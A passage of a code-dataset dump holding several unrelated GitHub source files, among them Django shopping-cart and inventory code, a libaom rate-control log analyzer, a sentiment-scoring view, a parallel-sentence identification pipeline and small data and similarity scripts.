quantidade_carrinho\r\n carrinho[variacao_id]['preco_quantitativo'] = preco_unitario * \\\r\n quantidade_carrinho\r\n carrinho[variacao_id]['preco_quantitativo_promocional'] = \\\r\n preco_unitario_promocional * quantidade_carrinho\r\n\r\n else:\r\n carrinho[variacao_id] = {\r\n 'produto_id': produto_id,\r\n 'produto_nome': produto_nome,\r\n 'variacao_nome': variacao_nome,\r\n 'variacao_id': variacao_id,\r\n 'preco_unitario': preco_unitario,\r\n 'preco_unitario_promocional': preco_unitario_promocional,\r\n 'preco_quantitativo': preco_unitario,\r\n 'preco_quantitativo_promocional': preco_unitario_promocional,\r\n 'quantidade': 1,\r\n 'slug': slug,\r\n 'imagem': imagem\r\n }\r\n\r\n self.request.session.save()\r\n messages.success(\r\n self.request,\r\n f'Produto {produto_nome} {variacao_nome} adicionado ao seu '\r\n f'carrinho. x{carrinho[variacao_id][\"quantidade\"]}'\r\n )\r\n return redirect(http_referer)\r\n\r\n\r\nclass RemoverDoCarinho(View):\r\n def get(self, *args, **kwargs):\r\n\r\n http_referer = self.request.META.get(\r\n 'HTTP_REFERER',\r\n reverse('produto:lista')\r\n )\r\n variacao_id = self.request.GET.get('vid')\r\n\r\n if not variacao_id:\r\n return redirect(http_referer)\r\n\r\n if not self.request.session.get('carrinho'):\r\n return redirect(http_referer)\r\n\r\n if variacao_id not in self.request.session['carrinho']:\r\n return redirect(http_referer)\r\n\r\n carrinho = self.request.session['carrinho'][variacao_id]\r\n\r\n messages.success(\r\n self.request,\r\n f'Produto {carrinho[\"produto_nome\"]} {carrinho[\"variacao_nome\"]}'\r\n f'removido do seu carrinho.'\r\n )\r\n\r\n del self.request.session['carrinho'][variacao_id]\r\n self.request.session.save()\r\n return redirect(http_referer)\r\n\r\n\r\nclass Carrinho(View):\r\n def get(self, *args, **kwargs):\r\n contexto = {\r\n 'carrinho': self.request.session.get('carrinho')\r\n }\r\n return render(self.request, 'produto/carrinho.html', contexto)\r\n\r\n\r\nclass ResumoDaCompra(View):\r\n def get(self, *args, **kwargs):\r\n if not self.request.user.is_authenticated:\r\n messages.warning(\r\n self.request, \"Efetue o login para finalizar a compra\")\r\n return redirect('perfil:criar')\r\n\r\n perfil = Perfil.objects.filter(usuario=self.request.user)\r\n\r\n if not perfil.exists():\r\n messages.error(\r\n self.request, \"Complete o cadastro do perfil para efetua a compra\")\r\n return redirect('perfil:criar')\r\n\r\n if not self.request.session.get('carrinho'):\r\n messages.error(\r\n self.request, \"Seu carrinho esta vazio\")\r\n return redirect('produto:lista')\r\n\r\n contexto = {\r\n 'carrinho': self.request.session.get('carrinho'),\r\n 'usuario': self.request.user,\r\n 'perfil': perfil.first()\r\n\r\n }\r\n\r\n return render(self.request, 'produto/resumodacompra.html', contexto)\r\n","repo_name":"MatheusLoeblein/Ecommerce","sub_path":"produto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11248292056","text":"import matplotlib.pyplot as plt\nimport os\n\n\ndef get_file_basename(filename):\n return filename.split(\".\")[0]\n\n\ndef parse_log(log_file):\n data_list = []\n with open(log_file) as fp:\n for line in fp:\n dic = {}\n word_ls = line.split()\n i = 0\n while i < len(word_ls):\n dic[word_ls[i]] = float(word_ls[i + 1])\n i += 2\n data_list.append(dic)\n fp.close()\n return data_list\n\n\ndef extract_data(data_list, name):\n arr = []\n for data in data_list:\n arr.append(data[name])\n return arr\n\n\ndef visualize_q_indices(exp_summary, exp_list, fig_path=None):\n for exp in exp_list:\n data = parse_log(exp[\"log\"])\n q_indices = extract_data(data, \"q\")\n plt.title(exp_summary)\n plt.xlabel(\"frame_coding_idx\")\n plt.ylabel(\"q_index\")\n plt.plot(q_indices, marker=\".\", label=exp[\"label\"])\n plt.legend()\n if fig_path:\n plt.savefig(fig_path)\n else:\n plt.show()\n plt.clf()\n\n\ndef get_rc_type_from_exp_type(exp_type):\n if exp_type == \"Q_3P\":\n return \"q\"\n return \"vbr\"\n\n\ndef test_video(exe_name, input, exp_type, level, log=None, limit=150):\n basic_cmd = (\"--test-decode=warn --threads=0 --profile=0 --min-q=0 --max-q=63\"\n \" --auto-alt-ref=1 --kf-max-dist=160 --kf-min-dist=0 \"\n \"--drop-frame=0 --static-thresh=0 --minsection-pct=0 \"\n \"--maxsection-pct=2000 --arnr-maxframes=7 --arnr-strength=5 \"\n \"--sharpness=0 --undershoot-pct=100 --overshoot-pct=100 \"\n \"--frame-parallel=0 --tile-columns=0 --cpu-used=3 \"\n \"--lag-in-frames=48 --psnr\")\n rc_type = get_rc_type_from_exp_type(exp_type)\n rc_cmd = \"--end-usage=\" + rc_type\n level_cmd = \"\"\n if rc_type == \"q\":\n level_cmd += \"--cq-level=\" + str(level)\n elif rc_type == \"vbr\":\n level_cmd += \"--target-bitrate=\" + str(level)\n limit_cmd = \"--limit=\" + str(limit)\n passes_cmd = \"--passes=3 --second-pass-log=second_pass_log\"\n output_cmd = \"-o test.webm\"\n input_cmd = \"~/data/\" + input\n log_cmd = \"\"\n if log != None:\n log_cmd = \">\" + log\n cmd_ls = [\n exe_name, basic_cmd, rc_cmd, level_cmd, limit_cmd, passes_cmd, output_cmd,\n input_cmd, log_cmd\n ]\n cmd = \" \".join(cmd_ls)\n os.system(cmd)\n\n\ndef gen_ratectrl_log(test_case):\n exe = test_case[\"exe\"]\n video = test_case[\"video\"]\n exp_type = test_case[\"exp_type\"]\n level = test_case[\"level\"]\n log = test_case[\"log\"]\n test_video(exe, video, exp_type, level, log=log, limit=150)\n return log\n\n\ndef gen_test_case(exp_type, dataset, videoname, level, log_dir=None):\n test_case = {}\n exe = \"./aomenc_bl\"\n if exp_type == \"BA_3P\":\n exe = \"./aomenc_ba\"\n test_case[\"exe\"] = exe\n\n video = os.path.join(dataset, videoname)\n test_case[\"video\"] = video\n test_case[\"exp_type\"] = exp_type\n test_case[\"level\"] = level\n\n video_basename = get_file_basename(videoname)\n log = \".\".join([dataset, video_basename, exp_type, str(level)])\n if log_dir != None:\n log = os.path.join(log_dir, log)\n test_case[\"log\"] = log\n return test_case\n\n\ndef run_ratectrl_exp(exp_config):\n fp = open(exp_config)\n log_dir = \"./lowres_rc_log\"\n fig_dir = \"./lowres_rc_fig\"\n dataset = \"lowres\"\n for line in fp:\n word_ls = line.split()\n dataset = word_ls[0]\n videoname = word_ls[1]\n exp_type_ls = [\"VBR_3P\", \"BA_3P\"]\n level_ls = [int(v) for v in word_ls[2:4]]\n exp_ls = []\n for i in range(len(exp_type_ls)):\n exp_type = exp_type_ls[i]\n test_case = gen_test_case(exp_type, dataset, videoname, level_ls[i],\n log_dir)\n log = gen_ratectrl_log(test_case)\n exp = {}\n exp[\"log\"] = log\n exp[\"label\"] = exp_type\n exp_ls.append(exp)\n video_basename = get_file_basename(videoname)\n fig_path = os.path.join(fig_dir, video_basename + \".png\")\n visualize_q_indices(video_basename, exp_ls, fig_path)\n fp.close()\n\n\nif __name__ == \"__main__\":\n run_ratectrl_exp(\"exp_rc_config\")\n","repo_name":"WebKit/WebKit","sub_path":"Source/ThirdParty/libwebrtc/Source/third_party/libaom/source/libaom/tools/ratectrl_log_analyzer/analyze_ratectrl_log.py","file_name":"analyze_ratectrl_log.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"20113364762","text":"from django.http import HttpResponse\nimport requests, json\nfrom django.conf import settings\nimport pickle\nfrom . import service\nimport pandas as pd\nimport os\n\ndef preprosessor(request):\n service.excel_to_txt()\n fopen = open(r'.\\asset\\data.txt', 'r')\n i=0\n temp_list = []\n line = fopen.readlines()\n while True:\n if not line : break\n client_id = getattr(settings, 'NAVER_ID')\n client_secret = getattr(settings, 'NAVER_SECRET')\n url = \"https://naveropenapi.apigw.ntruss.com/sentiment-analysis/v1/analyze\"\n header = {\n \"X-NCP-APIGW-API-KEY-ID\": client_id,\n \"X-NCP-APIGW-API-KEY\": client_secret,\n \"Content-Type\": \"application/json\"\n }\n data = {\n 'content': line[i]\n }\n r = requests.post(url, data=json.dumps(data), headers=header)\n k = HttpResponse(r)\n temp_list.append(k.getvalue().decode('utf-8'))\n i+=1\n if i==len(temp_list)-2:\n break\n fopen.close()\n with open(r\".\\asset\\clova_data_dump.pickle\",'wb') as fs:\n pickle.dump(temp_list, fs)\n service.pickle_find_highlight()\n df = pd.read_pickle(r'.\\asset\\final_data.pickle')\n for i,k in zip(df.index, df['품사']):\n temp=[i,k]\n df=service.one_new_weight(temp)\n service.all_new_weight(df)\n return HttpResponse(i)\n\ndef sentiment_analysis(request):\n currentPath = os.getcwd()\n client_id = getattr(settings, 'NAVER_ID')\n client_secret = getattr(settings, 'NAVER_SECRET')\n url = \"https://naveropenapi.apigw.ntruss.com/sentiment-analysis/v1/analyze\"\n header = {\n \"X-NCP-APIGW-API-KEY-ID\": client_id,\n \"X-NCP-APIGW-API-KEY\": client_secret,\n \"Content-Type\": \"application/json\"\n }\n data = {\n 'content': json.loads(request.body)['dialog']\n }\n r = requests.post(url, data=json.dumps(data), headers=header)\n k = HttpResponse(r)\n temp = [k.getvalue().decode('utf-8')]\n if 'negative' not in temp[0].split(\":\")[2]:\n return 0\n pathname = os.path.join(currentPath, \"naverapi\", \"modules\", \"asset\", \"clova_data_dump.pickle\")\n print(temp)\n with open(pathname, 'wb') as fs:\n pickle.dump(temp, fs)\n service.pickle_find_highlight()\n df1=pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\score_data.pickle')\n df2 =pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\final_data.pickle')\n df3 = pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\select_data.pickle')\n point = []\n rematch = []\n for i in df2.index:\n for k in df3.index:\n if i==k and df1.loc[k]['품사']==df3.iloc[k,2]:\n point.append(df3.iloc[k,4])\n break\n point=[]\n rematch=[]\n for i in df2.index:\n for k in df1.index:\n if i == k and df1.loc[k]['품사'] == df2.loc[i]['품사']:\n rematch.append([i, df1.loc[i]['품사']])\n point.append(df1.loc[i]['가중치'])\n break\n service.all_new_weight(service.one_new_weight(rematch))\n count = len(point)\n result_point=0\n point.sort(reverse=True)\n if count ==1:\n if point[0] >1:\n high_point = point[0]-0.5\n mid_point= high_point/2\n low_point =mid_point/2\n else:\n high_point = point[0]\n mid_point = point[0] / 2\n low_point = point[0] / 3\n elif count==2:\n if point[0]>1.5:\n high_point =point[0]-0.3\n mid_point= (point[0]+point[1])/2-0.3\n low_point= point[1]-0.3\n else:\n high_point = point[0]\n mid_point = (point[0] + point[1]) / 2\n low_point = point[1]\n elif count == 3:\n high_point = point[0]\n mid_point = point[1]\n low_point = point[2]\n else:\n high_point = sum(point[:int(count*0.3)])/len(point[:int(count*0.3)])\n mid_point = sum(point[int(count*0.3):int(count*0.6)])/len(point[int(count*0.3):int(count*0.6)])\n low_point = sum(point[int(count*0.6):])/len(point[int(count*0.6):])\n if count>=5 and low_point>1.5 :\n result_point = 5+count/5\n elif (mid_point+low_point)/2>1.4 or (high_point+mid_point+low_point)/3>1.6 or high_point>1.94 and count>=5:\n result_point = 4+count/5\n elif (high_point+mid_point+low_point)/3>1.3:\n result_point = 3+ count/5\n elif (high_point+mid_point+low_point)/3>1.0:\n result_point =2 + count/5\n elif (high_point+mid_point+low_point)/3>0.5:\n result_point = 1+count/5\n else:\n result_point = count/5\n return HttpResponse(result_point)","repo_name":"bong5472/depression_diagnose","sub_path":"server/naverapi/modules/Preprossor.py","file_name":"Preprossor.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31412333004","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\n\ndef trend(res):\n\ttrace_high = go.Scatter(\n\t\tx=[v[0] for v in res],\n\t\ty=[v[1] for v in res],\n\t\tname = \"Fatalities\",\n\t\tline = dict(color = '#17BECF'),\n\t\topacity = 0.8)\n\n\ttrace_low = go.Scatter(\n\t\tx=[v[0] for v in res],\n\t\ty=[v[2] for v in res],\n\t\tname = \"Injuries\",\n\t\tline = dict(color = '#7F7F7F'),\n\t\topacity = 0.8)\n\n\tdata = [trace_high, trace_low]\n\n\tlayout = dict(\n\t\ttitle='Fatalities and Injuries by Year',\n\t\txaxis=dict(\n\t\t\trangeslider=dict(),\n\t\t\ttype='date'\n\t\t\t)\n\t\t)\n\n\tfig = dict(data=data, layout=layout)\n\tp1=py.plot(fig, filename = \"trend plot\", auto_open=False)\n\treturn(p1)","repo_name":"hs220/Duke-CS-316","sub_path":"source code/app/Ploty/trend.py","file_name":"trend.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10541007747","text":"import chinese_corpus_translator\nimport candidate_parallel_sentence_pairs_searcher\nimport candidate_parallel_sentence_pairs_classifier\nimport configparser\nimport sys\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nsys.path.insert(0, '../../common/')\nimport common\n\nclass ParallelSentencePairsIdentifier(object):\n def __init__(self):\n pass\n\n @staticmethod\n def result_analysis(predictions_path, gold_standard_path, en_path, zh_path, write_false_positive=False):\n correct_predictions_count = 0\n predictions_count = 0\n gold_standard_dict = {}\n\n # TODO path go to config\n if write_false_positive:\n en_file = common.read_two_columns_file_to_build_dictionary_type_specified(en_path, str, str)\n zh_file = common.read_two_columns_file_to_build_dictionary_type_specified(zh_path, str, str)\n count_source_in_gold = 0\n count_source_not_in_gold = 0\n\n with open(gold_standard_path) as f1:\n for line1 in f1:\n (target_id, source_id) = line1.rstrip('\\n').split(\"\\t\")\n gold_standard_dict[source_id] = target_id\n\n with open(predictions_path) as f2:\n false_positive = open(config['output_files_for_test_data']['false_positive'], 'w')\n for line2 in f2:\n predictions_count += 1\n (target_id_predicted, source_id_predicted) = line2.rstrip('\\n').split(\"\\t\")\n if source_id_predicted in gold_standard_dict:\n if gold_standard_dict[source_id_predicted] == target_id_predicted:\n correct_predictions_count += 1\n elif write_false_positive:\n false_positive.write('ingold\\n' + source_id_predicted+ '\\n' +en_file[source_id_predicted] + '\\n'\n +target_id_predicted+'\\n'+ zh_file[target_id_predicted] + '\\n\\n')\n count_source_in_gold += 1\n elif write_false_positive:\n false_positive.write(source_id_predicted+ '\\n' +en_file[source_id_predicted] + '\\n'\n +target_id_predicted+'\\n'+ zh_file[target_id_predicted] + '\\n\\n')\n count_source_not_in_gold += 1\n\n if write_false_positive:\n false_positive.write('count_source_in_gold' + str(count_source_in_gold))\n false_positive.write('count_source_not_in_gold' + str(count_source_not_in_gold))\n\n print('#real translations predicted (TP)', correct_predictions_count)\n print('#real translations (TP+FN)', len(gold_standard_dict))\n recall = correct_predictions_count / len(gold_standard_dict)\n print('recall (TP/(TP+FN))', recall)\n print('#translations predicted (TP+FP)', predictions_count)\n precision = correct_predictions_count / predictions_count\n print('precision (TP/(TP+FP))', precision)\n print('f1', 2 * (precision * recall) / (precision + recall))\n\n @staticmethod\n def intersection(dict1_path, dict2_path, pred_path):\n dict1 = dict()\n with open(dict1_path) as f:\n for line in f:\n (target_id, source_id) = line.rstrip('\\n').split(\"\\t\")\n if target_id not in dict1:\n dict1[target_id] = [source_id]\n else:\n dict1[target_id].append(source_id)\n\n dict2 = dict()\n with open(dict2_path) as f:\n for line in f:\n (target_id, source_id) = line.rstrip('\\n').split(\"\\t\")\n if target_id not in dict2:\n dict2[target_id] = [source_id]\n else:\n dict2[target_id].append(source_id)\n\n keys_a = set(dict1.keys())\n keys_b = set(dict2.keys())\n target_id_intersection = keys_a & keys_b\n print(target_id)\n\n pred = open(pred_path, 'w')\n for target_id in target_id_intersection:\n print(target_id)\n count = 1\n for source_id in dict1[target_id]:\n if source_id in dict2[target_id]:\n pred.write(target_id + '\\t' + source_id + '\\n')\n count += 1\n if count == 3:\n print('*************')\n\n @staticmethod\n def all():\n # # ------------------------------------- Translating ----------------------------------------------------------\n # print('\\033[94m[translating training target file]\\033[0m')\n # cct_train = chinese_corpus_translator.ChineseCorpusTranslator(\n # zh_en_dict_path=config['dictionary']['zh_en_dict_for_training_data'],\n # remove_chinese_stopwords=config.getboolean(\"preprocessing_text\", \"remove_chinese_stopwords\"),\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming\"),\n # english_stem_for_dict=config.getboolean(\"preprocessing_text\", \"zh_en_dict_stemming\"),\n # chinese_tokenizer_mode_for_solr=config['preprocessing_text']['chinese_tokenizer_mode_for_solr'],\n # chinese_tokenizer_mode_for_overlap=config['preprocessing_text']['chinese_tokenizer_mode_for_overlap'])\n # cct_train.translate(\n # corpus_file_path=config['training_data']['zh'],\n # unknown_words_path=config['output_files_for_training_data']['unknown_words'],\n # translated_corpus_path=config['output_files_for_training_data']['translated_corpus_path'],\n # translated_corpus_for_selecter_path=\n # config['output_files_for_training_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # config['output_files_for_training_data']['translated_corpus_for_overlap_path'])\n #\n # print('\\033[94m[translating test target file]\\033[0m')\n # cct_test = chinese_corpus_translator.ChineseCorpusTranslator(\n # zh_en_dict_path=config['dictionary']['zh_en_dict_for_test_data'],\n # remove_chinese_stopwords=config.getboolean(\"preprocessing_text\", \"remove_chinese_stopwords\"),\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming\"),\n # english_stem_for_dict=config.getboolean(\"preprocessing_text\", \"zh_en_dict_stemming\"),\n # chinese_tokenizer_mode_for_solr=config['preprocessing_text']['chinese_tokenizer_mode_for_solr'],\n # chinese_tokenizer_mode_for_overlap=config['preprocessing_text']['chinese_tokenizer_mode_for_overlap'])\n # cct_test.translate(\n # corpus_file_path=config['test_data']['zh'],\n # unknown_words_path=config['output_files_for_test_data']['unknown_words'],\n # translated_corpus_path=config['output_files_for_test_data']['translated_corpus_path'],\n # translated_corpus_for_selecter_path=\n # config['output_files_for_test_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # config['output_files_for_test_data']['translated_corpus_for_overlap_path'])\n\n # # ------------------------------------- Searching --------------------------------------------------------------\n # print('\\033[94m[Solr searching for training data]\\033[0m')\n # cpsps_train = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # index_file_path=config['output_files_for_training_data']['translated_corpus_path'],\n # index_file_for_solr_path=config['output_files_for_training_data']['corpus_for_solr'],\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords_in_source\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming_in_source\"))\n # cpsps_train.search_corpus(\n # searching_file_path=config['training_data']['en'],\n # output_path=config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # gold_standard_file_path=config['training_data']['gold'])\n #\n # # # Reverse searching test\n # # print('\\033[94m[Solr searching for training data]\\033[0m')\n # # cpsps_train = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # # index_file_path=config['training_data']['en'],\n # # index_file_for_solr_path=config['output_files_for_training_data']['corpus_for_solr'])\n # # cpsps_train.search_corpus(\n # # searching_file_path=config['output_files_for_training_data']['translated_corpus_path'],\n # # output_path=config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # # gold_standard_file_path=config['training_data']['gold'])\n #\n # print('\\033[94m[Solr searching for test data]\\033[0m')\n # cpsps_test = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # index_file_path=config['output_files_for_test_data']['translated_corpus_path'],\n # index_file_for_solr_path=config['output_files_for_test_data']['corpus_for_solr'],\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords_in_source\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming_in_source\"))\n # cpsps_test.search_corpus(\n # searching_file_path=config['test_data']['en'],\n # output_path=config['output_files_for_test_data']['source_target_and_potential_targets_path'])\n\n # ------------------------------------- Classifying ------------------------------------------------------------\n # print('\\033[94m[SVM training]\\033[0m')\n # cpspc_train = candidate_parallel_sentence_pairs_classifier.CandidateParallelSentencePairsClassifier()\n # cpspc_train.preprocessing_data(\n # source_target_and_potential_targets_path=\n # config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # translated_target_information_path=\n # config['output_files_for_training_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # config['output_files_for_training_data']['translated_corpus_for_overlap_path'],\n # source_information_path=config['training_data']['en'],\n # output_folder_path_prefix=config['output_files_for_training_data']['features_labels'])\n\n print('\\033[94m[SVM predicting]\\033[0m')\n cpspc_test = candidate_parallel_sentence_pairs_classifier.CandidateParallelSentencePairsClassifier()\n cpspc_test.prediction(\n training_folder_path=config['output_files_for_training_data']['features_labels'],\n test_source_target_and_potential_targets_path=\n config['output_files_for_test_data']['source_target_and_potential_targets_path'],\n test_translated_target_information_path=\n config['output_files_for_test_data']['translated_corpus_for_selecter_path'],\n test_translated_corpus_for_overlap_path=\n config['output_files_for_test_data']['translated_corpus_for_overlap_path'],\n test_source_information_path=config['test_data']['en'],\n test_output_folder_path_prefix=config['output_files_for_test_data']['features_labels']\n )\n\n\n# # Whole system test (Test run 1)\n# ParallelSentencePairsIdentifier.all()\nParallelSentencePairsIdentifier.result_analysis(\n predictions_path=config['output_files_for_test_data']['predictions'],\n gold_standard_path=config['test_data']['gold'],\n en_path=config['test_data']['en'],\n zh_path=config['test_data']['zh'],\n write_false_positive=True)\n\n# # Test run 2\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_config2_test',\n# gold_standard_path='../data/bucc2017/test_data/zh-en.test.gold')\n\n# # Test run 3\n# ParallelSentencePairsIdentifier.intersection(\n# dict1_path='../data/predictions',\n# dict2_path='../data/predictions_config2_test_10000',\n# pred_path='../data/predictions_config3_test'\n# )\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_config3_test',\n# gold_standard_path='../data/bucc2017/test_data/zh-en.test.gold')\n\n\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_intersection',\n# gold_standard_path='../data/bucc2017/training_data/zh-en.training.gold')\n","repo_name":"zzcoolj/Parallel-Sentences-Identifier","sub_path":"code/parallel_sentence_pairs_identifier.py","file_name":"parallel_sentence_pairs_identifier.py","file_ext":"py","file_size_in_byte":12818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"17966263093","text":"from django.db import models\n\n\n# Create your models here.\n\nclass Podjetje(models.Model):\n naziv = models.CharField(default=\"/\",max_length=50)\n\nclass PoslovnaEnota(models.Model):\n naziv = models.CharField(default=\"/\",max_length=50)\n podjetje = models.ForeignKey(Podjetje,on_delete=models.CASCADE)\n \nclass Tip(models.Model):\n naziv = models.CharField(default=\"/\",max_length=30)\n kratica = models.CharField(default=\"/\",max_length=5)\n barva = models.CharField(default=\"yellow\",max_length=30)\n\nclass Dimenzija(models.Model):\n radij = models.CharField(default=\"/\",max_length=30)\n sirina = models.CharField(default=\"/\",max_length=30)\n visina = models.CharField(default=\"/\",max_length=30)\n special = models.BooleanField(default=False)\n dimenzija = models.CharField(default=\"/\",max_length=30)\n\n class Meta:\n ordering = ['radij', 'visina', 'sirina' , 'special']\n\n def __str__(self):\n return self.dimenzija\n \nclass Sestavina(models.Model):\n naziv = models.CharField(default=\"/\",max_length=30)\n dimenzija = models.ForeignKey(Dimenzija,default=None,blank=True, null=True,on_delete=models.CASCADE)\n tip = models.ForeignKey(Tip,default=None,blank=True, null=True,on_delete=models.CASCADE)\n lastnosti = models.ManyToManyField(\"LastnostSestavine\")\n\n def __str__(self):\n return self.naziv\n\nclass LastnostSestavine(models.Model):\n naziv = models.CharField(default=\"TRDOTA\", max_length=30)\n\nclass Zaloga(models.Model):\n naziv = models.CharField(default=\"/\",max_length=30)\n poslovnaEnota = models.ForeignKey(PoslovnaEnota, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.naziv\n\nclass VnosZaloge(models.Model):\n zaloga = models.ForeignKey(Zaloga,on_delete=models.CASCADE, related_name=\"vnosi\")\n sestavina = models.ForeignKey(Sestavina, on_delete=models.CASCADE, related_name=\"vnosi_zaloge\")\n lastnostSestavine = models.ForeignKey(LastnostSestavine,on_delete=models.SET_NULL, default=None, null=True, blank=True, related_name=\"vnosi_zaloge\")\n kolicina = models.FloatField(default=0)\n\nclass Baza(models.Model):\n zaloga = models.ForeignKey(Zaloga,default=None,null=True,blank=True,on_delete=models.SET_NULL)\n naziv = models.CharField(default=\"/\",max_length=30)\n tip = models.CharField(default=\"/\",max_length=30)\n status = models.CharField(default=\"aktivno\",max_length=30)\n datum = models.DateTimeField()\n\n def uveljavi(self):\n self.status = \"veljavno\"\n self.save()\n print(\"UVELJAVLJAM BAZO\")\n\nclass Paket(models.Model):\n baza = models.ForeignKey(Baza,default=None, null=True, blank=True, on_delete=models.SET_NULL)\n cas = models.DateTimeField()\n isModel = models.BooleanField(default=False)\n\nclass VnosDimenzijePaketa(models.Model):\n paket = models.ForeignKey(Paket, on_delete=models.CASCADE)\n dimenzija = models.ForeignKey(Dimenzija, on_delete=models.CASCADE)\n\nclass VnosTipaPaketa(models.Model):\n vnosDimenzijePaketa = models.ForeignKey(VnosDimenzijePaketa, on_delete=models.CASCADE)\n tip = models.ForeignKey(Tip,default=None,null=True,blank=True,on_delete=models.SET_NULL)\n lastnostSestavine = models.ForeignKey\n kolicina = models.IntegerField(default=0)\n\nclass VnosBaze(models.Model):\n baza = models.ForeignKey(Baza,on_delete=models.CASCADE, related_name=\"vnosi\")\n sestavina = models.ForeignKey(Sestavina,on_delete=models.CASCADE)\n lastnostSestavine = models.ForeignKey(LastnostSestavine, on_delete=models.SET_NULL, default=None, null=True, blank=True)\n stevilo = models.IntegerField(default=0)\n # NASTAVLJENO ZA BAZE TIPA KONTEJNER\n paket = models.OneToOneField(VnosTipaPaketa,default=None, null=True,blank=True, on_delete=models.CASCADE)\n cas = models.DateTimeField(default=None, null=True,blank=True)\n\nclass SpremembaZaloge(models.Model):\n vnos_baze = models.ForeignKey(VnosBaze, on_delete=models.CASCADE)\n vnos_zaloge = models.ForeignKey(VnosZaloge,on_delete=models.CASCADE)\n sprememba = models.FloatField()\n fiks = models.BooleanField(default=False)\n cas = models.DateTimeField()","repo_name":"TadejGrof/LaBodega","sub_path":"proizvodnja/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12138488543","text":"import gzip\nimport csv\n#import pandas as pd\n\nseqs = [] # stores dna/rna sequences\ndescriptors = [] # stores description of sequences\nclasses = [] # stores 1 for positive and 0 for negative\n\n# parse file of positives\nwith open(snakemake.input[0], 'r') as fasta_file:\n for line in fasta_file:\n if line[0] == '>':\n descriptors.append(line)\n else:\n seqs.append(line)\n classes.append(1)\n\n# parse file of negatives\nwith open(snakemake.input[1], 'r') as fasta_file:\n for line in fasta_file:\n if line[0] == '>':\n descriptors.append(line)\n else:\n seqs.append(line)\n classes.append(0)\n\ncounter = 0\nwith open(snakemake.output[0], 'w', newline='') as csvfile:\n # fieldnames = ['FoldID', 'EventID seq', 'Bound']\n # writer = csv.DictWriter(csvfile, fieldnames, delimiter='\\t', lineterminator='\\n')\n\n # writer.writeheader()\n # writer.writerow({'FoldID': 'A', 'EventID seq': f'seq_{counter:05d}_peak', 'Bound': (seqs[0] +\n # '\\t1')})\n csvfile.write('FoldID\\tEventID seq\\tBound\\t\\n')\n for seq, clas in zip(seqs, classes):\n csvfile.write(f'A\\tseq_{counter:07d}_peak\\t{seq[:100]}\\t{clas}\\n')\n counter += 1\n","repo_name":"julianhesse/Bachelor-Project","sub_path":"scripts/preprocess_deepbind.py","file_name":"preprocess_deepbind.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25330323772","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom numpy import *\nfrom numpy import linalg as la\ndef loadExData():\n return [[1,1,1,0,0],\n [2,2,2,0,0],\n [5,5,5,0,0],\n [1,1,0,2,2],\n [0,0,0,3,3],\n [0,0,0,1,1]]\n\n# 利用不同的方法计算相似度\ndef eulidSim(inA, inB):\n return 1.0/(1.0+la.norm(inA - inB))#根据欧式距离计算相似度\n\ndef pearsSim(inA, inB):\n if len(inA)<3:\n return 1.0\n else:\n return 0.5+0.5*corrcoef(inA, inB, rowvar = 0)[0][1]\n\ndef cosSim(inA, inB):\n num = float(inA.T*inB) #向量inA和向量inB点乘,得cos分子\n denom = la.norm(inA)*la.norm(inB) #向量inA,inB各自范式相乘,得cos分母\n return 0.5+0.5*(num/denom) #从-1到+1归一化到[0,1]\n\nmyMat = mat(loadExData())\nprint(eulidSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用欧式距离计算相似度\nprint(eulidSim(myMat[:,0], myMat[:,0])) #第一行和第一行欧式距离计算相似度\nprint(cosSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用cos距离计算相似度\nprint(cosSim(myMat[:,0], myMat[:,0])) #第一行和第一行利用cos距离计算相似度\nprint(pearsSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用皮尔逊距离计算相似度\nprint(pearsSim(myMat[:,0], myMat[:,0])) 